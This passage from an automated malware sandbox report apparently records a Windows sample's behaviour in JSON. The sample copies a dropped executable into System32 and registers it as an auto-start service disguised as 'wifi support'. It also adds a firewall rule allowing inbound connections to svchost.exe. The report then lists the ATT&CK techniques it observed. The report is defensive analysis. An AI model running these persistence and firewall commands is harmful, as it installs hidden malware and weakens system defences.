"name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\cygqxrtx\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005824", "parentuid": "00000000-00005780", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\mpvpepag.exe\" %WINDIR%\\system32\\cygqxrtx\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004136", "parentuid": "00000000-00005780", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create cygqxrtx binPath= \"%WINDIR%\\system32\\cygqxrtx\\mpvpepag.exe /d\\\"C:\\6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00006064", "parentuid": "00000000-00005780", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description cygqxrtx \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00006040", "parentuid": "00000000-00005780", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start cygqxrtx", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004380", "parentuid": "00000000-00005780", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00004252", "name": "mpvpepag.exe", "normalized_path": "%WINDIR%\\system32\\cygqxrtx\\mpvpepag.exe", "command_line": "/d\"C:\\6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\"", "sha256": "6c98bcaca6e93323c3d62ae737a0137fe459e3b3cb179d01208f6c6c6c2166bf"}, {"uid": "00000000-00002572", "parentuid": "00000000-00004252", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 6, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 20}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mpvpepag.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Control Panel\" (Path: 